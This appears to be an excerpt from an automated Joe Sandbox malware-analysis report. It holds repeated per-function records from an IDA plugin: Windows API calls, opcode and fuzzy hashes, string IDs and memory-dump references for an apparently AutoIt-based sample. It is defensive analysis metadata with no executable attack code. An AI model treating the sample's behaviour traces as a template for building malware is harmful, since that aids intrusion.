                                                                                                                                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                              APIs
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                              • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                              APIs
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                              • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                              APIs
                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                              • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                              • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1454798553-0
                                                                                                                                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strncmp
                                                                                                                                              • String ID: Q\E
                                                                                                                                              • API String ID: 909875538-2189900498
                                                                                                                                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: U$\
                                                                                                                                              • API String ID: 4104443479-100911408
                                                                                                                                              • Opcode ID: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                                                              • Instruction ID: 856fd8c118fd9d88a35ce60e305a75550171e0483a96a15f1a05c3eab080688b
                                                                                                                                              • Opcode Fuzzy Hash: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                                                                                                              • Instruction Fuzzy Hash: D2C1B070E002499FEF14CF69C4907AEFBF2AF85304F2881AED451A7341D739A946CB55
                                                                                                                                              APIs
                                                                                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                                              • API String ID: 2652923123-3941886329
                                                                                                                                              • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                              • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove_strncmp
                                                                                                                                              • String ID: U$\
                                                                                                                                              • API String ID: 2666721431-100911408
                                                                                                                                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                              • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                              • String ID: LPT
                                                                                                                                              • API String ID: 3035604524-1350329615
                                                                                                                                              • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                              • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \$h
                                                                                                                                              • API String ID: 4104443479-677774858
                                                                                                                                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                                              • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memcmp
                                                                                                                                              • String ID: &
                                                                                                                                              • API String ID: 2931989736-1010288
                                                                                                                                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 4104443479-2967466578
                                                                                                                                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                              APIs
                                                                                                                                              • _wcslen.LIBCMT ref: 00466825
                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CrackInternet_wcslen
                                                                                                                                              • String ID: |
                                                                                                                                              • API String ID: 596671847-2343686810
                                                                                                                                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
